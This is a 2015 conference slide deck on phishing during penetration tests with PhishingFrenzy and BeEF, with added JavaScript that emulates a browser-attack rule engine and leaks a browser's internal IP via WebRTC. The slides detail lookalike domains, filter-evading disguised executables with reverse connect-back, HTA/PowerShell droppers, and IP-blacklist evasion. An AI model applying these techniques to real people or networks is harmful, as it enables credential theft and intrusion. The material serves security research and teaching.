Dark Fairytales from a Phisherman (Vol. II)

Information about Dark Fairytales from a Phisherman (Vol. II)

Published on September 17, 2015

Author: micheleorru2

Source: slideshare.net

1. Dark Fairytales from a Phisherman (Vol. II) @antisnatchor

2. Outline
• whoami
• Fishing === Phishing
• Badass phishing at cost (almost) zero
• Fairytalessss
• The new BeEF Autorun Rule Engine
• Outro

3. whoami
• Pentester & vuln researcher
• BeEF lead core developer
• Browser Hacker's Handbook co-author
• 44Con 2012 (I'm The Butcher, Would You Like Some BeEF?)
• (ex) Surf casting pro fisherman
• (current) Phisherman

4. Phisherman preparation

5. Fishing === Phishing
(F): Prepare bait and cast it
(P): Prepare pretext and phishing strategy, and send emails
(F): Wait for something to take an interest in the bait
(P): Wait for victims to click on your links, enter credentials, open/execute stuff
(F): You got a big fish
(P): You got a shell on the company's CFO laptop

6. Fishing === Phishing

7. Fishing === Phishing
• End-users are sometimes more stupid than saltwater fish
  – Fish do evolve: you have to use smaller hooks and fluorocarbon lines for increased stealth
  – Humans apparently do not evolve: we're doing phishing with 15-year-old attacks that still work
    • MS Office macros
    • HTA files
    • Custom .exe files

8. Badass phishing at cost (almost) zero
• If you do phishing, you know that:
  – Every time it's a different story
  – Configuration overhead is sometimes a killer
  – You can identify repeatable patterns
  – You need automation
  – Speed is key once you have access to the victims' assets

9. Badass phishing at cost (almost) zero
• Meet PhishLulz: phishing automation in Ruby
• Puts together PhishingFrenzy + BeEF on a dedicated Amazon EC2 image
  – Cheers @zeknox for creating PF!!!

10. Badass phishing at cost (almost) zero
• Current features:
  – Mass mailing with HTML templates (SET… LOL)
  – Highly configurable template system
  – HTTP/HTTPS support, credential harvesting
  – BeEF integration
    • Correlate victim name/email with OS/browser fingerprinting, including geolocation
    • Automate client-side attacks via the new BeEF ARE
  – Reporting

11. Badass phishing at cost (almost) zero
• What is left to the consultant as a manual step:
  – Register and configure a new domain if (provider !== NameCheap)
    • NameCheap is one of the few providers with a RESTful API (it still sucks), so with it that step can be automated
  – Eventually creating/modifying a phishing template or client-side vector
  – Wait for browser hooks, harvested credentials and shells

12. Badass phishing at cost (almost) zero
• Amazon advantages:
  – Domain/IP blacklisted? Fixed in 2 steps:
    • Reboot the AWS instance (strictly a stop/start: a plain reboot keeps the same public IPv4, while a stop/start of an instance without an Elastic IP gets a fresh one)
    • Update the A record for your main phishing domain
  – Good IP block reputation
  – Cheap, zero maintenance
    • t2.small -> $0.026/hour -> about $0.62/day -> $3.12 per 5 days

13. Fairytale 1 (s/lulz/real_target_name/)
• Target: www.lulz.wa.gov.au (GMT+8)
  – Discovered during reconnaissance:
    • webmail.lulz.com: Outlook Web Access
    • vpn1.lulz.com: Checkpoint SSL VPN
  – OWA template (phishing + email pretext) available in PF
  – Registered lulz-wa-gov-au.com (note dashes instead of dots)

14-15. Fairytale 1
• Started campaign with 46 targets at 13:30 target time

16. Fairytale 1
• In less than 3 hours (by 5 PM, close of business in the target timezone): 39% success rate
  – Harvested credentials: domain credentials, VPN credentials

17-18. Fairytale 1

19-20. Fairytale 1
• Results:
  – Gov network compromised (including AD)
  – Pure blackbox: external access -> client-side attack -> internal network access -> internal pentest
  – Overall time spent:
    • 4 hours preparation/recon
    • 2 days harvesting/pwning
  – Total cost:
    • About $2 for EC2
    • About $8 for the domain registration
    • $10 total cost

21. Fairytale 2
• The Telegraph UK asked us to target a specific journalist (Sept 2014). Info provided:
  – Name: Sophie Curtis
  – Not much info from reconnaissance
  – Target writes about IT stuff, breaches, and so on
  – Together with a Brazilian friend of mine we did the engagement
    • You will not find our names here: http://www.telegraph.co.uk/technology/internet-security/11153381/How-hackers-took-over-my-computer.html

22. Fairytale 2
• Attack plan:
  – Generic LinkedIn invite phishing campaign
    • Aim: profile the journalist's OS/browser/plugins with BeEF
    • Aim 2: detect mail provider/tech
  – After fingerprinting, 3 client-side attack options:
    1. Custom encoded .exe inside a password-encrypted .rar
    2. Word document with PowerShell macro
    3. HTA attack targeted at Internet Explorer

23. Fairytale 2
• LinkedIn attack (template in PF)
• This still works, but LinkedIn changed the mail look & feel, and also the auth behavior…

24. Fairytale 2
• OS, browser and plugin fingerprint via BeEF
  – Note: Office 2012, Java 1.7u51, Citrix ICA Client

25. Fairytale 2
• Credible pretext (snip 1/2):

26. Fairytale 2
• Credible pretext (snip 2/2):

27. Fairytale 2
• Via the initial fingerprinting we identified that the victim was using Gmail for Business
  – Encrypted .zip is not an option: ZIP encrypts entry data but not the central directory, so the .exe filename inside leaks to the mail filter
  – "Good" antispam/AV
  – Phishing domain with SPF/DKIM
  – Encrypted .rar with custom .exe inside

28. Fairytale 2
• Payload:
  – .exe file with 3 connect-back mechanisms
    • Reverse HTTPS
    • Reverse DNS
    • OOB extrusion via Outlook profile
  – Custom encoding
  – Modified Adobe PDF icon + long Windows filename trick (so the real extension is pushed out of view)
  – Custom MsgBox with PDF icon (msg: "Adobe Reader could not open xxx.pdf")

29. Fairytale 2
• The victim believed the pretext; she even replied, once she had double-clicked the payload, asking for more clarification
• Camera/microphone access. Game over

30-31. Fairytale 2
• Plan B was ready in case of Plan A failure

32. PhishingFrenzy + BeEF FTW
• PhishLulz phishing with BeEF ARE: video demo

33. Badass phishing at cost (almost) zero. Once again!
• If you do phishing, you know that:
  – Every time it's a different story
  – Configuration overhead is sometimes a killer
  – You can identify repeatable patterns
  – You need automation
  – Speed is key once you have access to the victims' assets

34. Autorun Rule Engine
• Released to the public at the end of July 2015
• Define rules that trigger module(s) when certain conditions match, with two execution modes:
  – Sequential
  – Nested-forward

35. Autorun Rule Engine
• Sequential
  – Call N modules with specified inputs and different delays via setTimeout()
• Nested-forward
  – Call N modules with specified inputs
  – Module N is executed only if module N-1 returns a certain status. Module N can use the output of module N-1 as its input (optionally mangling it before processing)

36-40. Autorun Rule Engine: Nested-forward

41. Autorun Rule Engine
• Match
  – Browser type, version
  – OS type, version
  – (WIP) Plugin type/version
• Trigger
  – if (browser == IE && os >= Windows 7)
    • PowerShell stuff (HTA)
  – if (browser == FF && os == Linux)
    • Firefox fake notification + extension dropper (Linux payload)

42. Autorun Rule Engine
• Sequential mode:
  – Call hta_powershell with a 0.5 second delay, after displaying the fake notification bar with custom text

43. Autorun Rule Engine
• Fake notification and HTA PowerShell rule (and Avast Premium AV lol): video

44. Autorun Rule Engine
• Nested-forward mode:
  – Fingerprint the internal network, using the hooked browser's internal IP for subnet mapping
    • No IP returned (i.e. WebRTC disabled)? Don't run the fingerprinting
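To make the two execution modes concrete, here is an added JavaScript illustration, written for this page and not code from BeEF or PhishLulz, of a rule engine with the semantics slides 35, 41, 42 and 44 describe: match on browser/OS, sequential mode scheduling each module with its own setTimeout() delay, and nested-forward mode running module N only if module N-1 returned the wanted status, with N-1's output (mangled into a /24) fed to N. The module names, rule fields (`chain_mode`, `execution_delay`, `osMinVersion`), URLs and fingerprints are hypothetical stand-ins chosen to echo the slide vocabulary, not BeEF's actual rule schema.

```javascript
// Added illustration, not BeEF's own code: a miniature rule engine that
// reproduces the two ARE execution modes the slides describe. Module names,
// rule fields and fingerprints are hypothetical stand-ins.

// Ordering used for an "os >= Windows 7" style condition (assumed labels).
const WINDOWS_ORDER = { "XP": 1, "Vista": 2, "7": 3, "8": 4, "8.1": 5, "10": 6 };

// A rule matches when browser and OS agree with the hooked browser's
// fingerprint ("ALL" is a wildcard) and, on Windows, the version is at least
// the rule's minimum.
function ruleMatches(rule, fp) {
  if (rule.browser !== "ALL" && rule.browser !== fp.browser) return false;
  if (rule.os !== "ALL" && rule.os !== fp.os) return false;
  if (rule.os === "Windows" && rule.osMinVersion !== undefined) {
    const have = WINDOWS_ORDER[fp.osVersion];
    const need = WINDOWS_ORDER[rule.osMinVersion];
    if (have === undefined || need === undefined || have < need) return false;
  }
  return true;
}

// Stand-in modules: (fingerprint, options, input) -> {status, output},
// status 1 = success, 0 = failure. Nothing here touches a real browser.
const MODULES = {
  fake_notification: (fp, opts) => ({ status: 1, output: opts.text }),
  hta_powershell: (fp, opts) => ({ status: 1, output: "hta served from " + opts.url }),
  firefox_extension_dropper: () => ({ status: 1, output: "xpi offered" }),
  // Emulates the WebRTC internal-IP leak: fails when WebRTC is disabled.
  get_internal_ip_webrtc: (fp) =>
    fp.webrtc ? { status: 1, output: fp.internalIp } : { status: 0, output: null },
  // Receives the subnet derived (mangled) from the previous module's output.
  internal_network_fingerprint: (fp, opts, subnet) =>
    ({ status: 1, output: "fingerprinting " + subnet }),
};

// Runs one rule against one hooked browser. `schedule` defaults to setTimeout
// (as on the slides) and is injectable so the sequential path can be driven
// synchronously.
function runRule(rule, fp, registry, schedule = setTimeout) {
  const executed = [];
  if (!ruleMatches(rule, fp)) return { matched: false, executed };

  if (rule.chain_mode === "sequential") {
    // Every module is scheduled up front with its own delay; results land in
    // `executed` when the timers fire.
    rule.modules.forEach((m, i) => {
      schedule(() => {
        executed.push({ name: m.name, ...registry[m.name](fp, m.options || {}, null) });
      }, rule.execution_delay[i]);
    });
  } else if (rule.chain_mode === "nested-forward") {
    // Module N runs only if N-1 returned the status the rule asks for; the
    // previous output, optionally mangled, becomes N's input.
    let prev = null;
    for (const m of rule.modules) {
      if (prev !== null && m.condition && !m.condition(prev)) {
        executed.push({ name: m.name, skipped: true });
        break;
      }
      let input = prev === null ? null : prev.output;
      if (prev !== null && m.mangle) input = m.mangle(input);
      prev = registry[m.name](fp, m.options || {}, input);
      executed.push({ name: m.name, ...prev });
    }
  } else {
    throw new Error("unknown chain_mode: " + rule.chain_mode);
  }
  return { matched: true, executed };
}

// Rules mirroring slides 41-44: IE on Windows 7+ gets the notification bar and
// the HTA 500 ms later; Firefox on Linux gets the extension dropper; every
// browser gets the WebRTC -> internal-fingerprint chain, which stops when no
// internal IP comes back.
const RULES = [
  { name: "ie_hta", browser: "IE", os: "Windows", osMinVersion: "7",
    chain_mode: "sequential", execution_delay: [0, 500],
    modules: [
      { name: "fake_notification", options: { text: "Adobe Flash Player update required" } },
      { name: "hta_powershell", options: { url: "https://example.invalid/update.hta" } },
    ] },
  { name: "ff_linux_xpi", browser: "FF", os: "Linux",
    chain_mode: "sequential", execution_delay: [0, 0],
    modules: [
      { name: "fake_notification", options: { text: "Missing plugin" } },
      { name: "firefox_extension_dropper" },
    ] },
  { name: "webrtc_then_fingerprint", browser: "ALL", os: "ALL",
    chain_mode: "nested-forward",
    modules: [
      { name: "get_internal_ip_webrtc" },
      { name: "internal_network_fingerprint",
        condition: (prev) => prev.status === 1,
        mangle: (ip) => ip.replace(/\.\d+$/, ".0/24") },
    ] },
];

// What the engine does when a new browser hooks in: run every matching rule.
function applyRules(rules, fp, registry, schedule = setTimeout) {
  return rules.filter((r) => ruleMatches(r, fp))
              .map((r) => ({ rule: r.name, ...runRule(r, fp, registry, schedule) }));
}

// Stand-alone run on a constructed fingerprint, with a synchronous scheduler
// so the sequential results are visible immediately.
const runNow = (fn) => fn();
console.log(JSON.stringify(applyRules(RULES,
  { browser: "IE", os: "Windows", osVersion: "8.1", webrtc: true, internalIp: "10.0.3.17" },
  MODULES, runNow)));
```

The injectable scheduler is the only liberty taken with the slide's description: the real engine fires the modules from setTimeout() inside the hooked browser, and a rule author who needs module N to see module N-1's result must use nested-forward rather than hoping the delays line up.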

45. Autorun Rule Engine
• Get the internal IP via the WebRTC bug, then fingerprint the internal network
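The "WebRTC bug" on this slide is the ICE host-candidate leak: a page can open a throwaway RTCPeerConnection and read the browser's LAN address out of the gathered candidates, which is what the internal-network fingerprinting then uses for subnet mapping. The following is an added example written for this page, not BeEF's get_internal_ip_webrtc module: the parsing and subnet derivation run anywhere, the browser-side gathering function only where RTCPeerConnection exists, and the candidate strings are constructed samples (IPs, foundations and priorities are made up).

```javascript
// Added example (not BeEF's own module): extract a hooked browser's internal
// IPv4 from ICE host candidates and derive the /24 a nested-forward rule would
// hand to an internal-network fingerprinting module.

// RFC 1918 private ranges; anything else is not "internal" and is ignored.
function isPrivateIPv4(ip) {
  const o = ip.split(".").map(Number);
  if (o.length !== 4 || o.some((n) => Number.isNaN(n) || n < 0 || n > 255)) return false;
  return o[0] === 10 ||
         (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
         (o[0] === 192 && o[1] === 168);
}

// ICE candidate grammar (RFC 5245): "candidate:<foundation> <component>
// <transport> <priority> <address> <port> typ <type> ...". Only "host"
// candidates carry a local interface address; "srflx" carries the public
// address seen by STUN (its raddr repeats the host address, not parsed here).
const CANDIDATE_RE = /candidate:\S+ \d+ (udp|tcp) \d+ (\S+) \d+ typ (\S+)/i;

function internalIpsFromCandidates(candidateLines) {
  const found = new Set();
  for (const line of candidateLines) {
    const m = CANDIDATE_RE.exec(line);
    if (!m || m[3].toLowerCase() !== "host") continue;
    const addr = m[2];
    // Current browsers replace the host address with an mDNS name (x.local)
    // unless the page already holds media permission: nothing to map then.
    if (addr.endsWith(".local")) continue;
    if (isPrivateIPv4(addr)) found.add(addr);
  }
  return [...found];
}

// The /24 that the internal fingerprinting module would sweep.
function slash24(ip) {
  return ip.split(".").slice(0, 3).join(".") + ".0/24";
}

// Browser side: a throwaway RTCPeerConnection with a data channel makes the
// ICE agent gather candidates; every candidate string goes to the parser.
// Only does something where RTCPeerConnection exists (i.e. in a hooked
// browser); elsewhere it reports an empty list.
function leakInternalIps(done) {
  const PC = typeof RTCPeerConnection !== "undefined" ? RTCPeerConnection : null;
  if (!PC) { done([]); return; }
  const pc = new PC({ iceServers: [] });
  const lines = [];
  pc.createDataChannel("x");
  pc.onicecandidate = (ev) => {
    if (ev.candidate) { lines.push(ev.candidate.candidate); return; }
    pc.close();                       // null candidate = gathering finished
    done(internalIpsFromCandidates(lines));
  };
  pc.createOffer().then((offer) => pc.setLocalDescription(offer));
}

// Constructed sample: what a hooked browser with one LAN interface and a
// STUN-derived public candidate might report.
const SAMPLE_CANDIDATES = [
  "candidate:842163049 1 udp 2122260223 192.168.1.23 56789 typ host generation 0",
  "candidate:842163049 2 udp 2122260222 192.168.1.23 56790 typ host generation 0",
  "candidate:1853887674 1 udp 1686052607 203.0.113.5 56789 typ srflx raddr 192.168.1.23 rport 56789 generation 0",
];

console.log(internalIpsFromCandidates(SAMPLE_CANDIDATES).map(slash24));
```

The empty-list path is the one the slide's nested-forward rule cares about: when WebRTC is disabled (or the browser hands back only mDNS names), the module reports failure and the fingerprinting step is never scheduled.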

46. Autorun Rule Engine
• RESTful API for it
  – Load rules at BeEF startup, or add them at runtime
    • Example: you notice many new hooked browsers, and you don't have any pre-loaded rules for them yet
  – Once a new rule is dynamically loaded, trigger it
    • Of course only on hooked browsers matching the rule

47. Autorun Rule Engine
• Missing plugin notification dropper and Pretty Theft with Windows theme

48. Autorun Rule Engine
• How I imagine the usage of BeEF ARE:
  – Write rulesets to cover most of your client-side exploitation needs
  – Have at least 2-3 rules for each browser
  – Use beef.browser.isX() to detect browser and plugins, then launch the appropriate Metasploit module (latest Flash??)
  – Have generic rules without payload droppers

49. Autorun Rule Engine
• How I imagine the usage of BeEF ARE:
  – Get the internal IP via the WebRTC bug (Chrome/Firefox), scan the internal network, blindly launch cross-origin ShellShock requests and have your listeners ready
  – Have a PF phishing campaign pre-configured for a specific phishing scenario, with BeEF ARE rules pre-loaded and ready to trigger as soon as the email is received

50. More on BeEF
• @byt3bl33d3r talk tomorrow, 14:00: MITMf: Bringing Man-In-The-Middle attacks to the 21st century
  – See how you can inject the BeEF hook in MITM situations, leveraging the new ARE
  – Detect OS/architecture more reliably via network fingerprint, then feed it back to BeEF ;-)

51. PhishingFrenzy + BeEF FTW
… BTW, that's not the ISIS black flag, just BeEF offline browsers …

52. Outro
Hope you enjoyed the dark fairytales!

Related pages: the 44CON LONDON 2015 schedule and grid, which list "Dark Fairytales from a Phisherman (Vol.II)" in the programme (44CON, 44con@44con.com).